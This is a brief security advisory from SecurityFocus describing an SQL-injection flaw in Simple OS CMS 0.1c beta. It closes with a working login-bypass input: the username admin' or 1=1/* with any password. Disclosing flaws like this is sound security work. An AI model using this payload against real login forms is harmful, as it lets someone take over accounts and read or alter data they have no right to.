17 lines
No EOL
555 B
Text
17 lines
No EOL
555 B
Text
source: https://www.securityfocus.com/bid/27589/info
|
|
|
|
Simple OS CMS is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
|
|
|
|
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Simple OS CMS 0.1c beta is vulnerable; other versions may also be affected.
|
|
|
|
The following exploit information is available:
|
|
|
|
Passing:
|
|
|
|
username: admin' or 1=1/*
|
|
password: something
|
|
|
|
|
|
will bypass the authentication process. |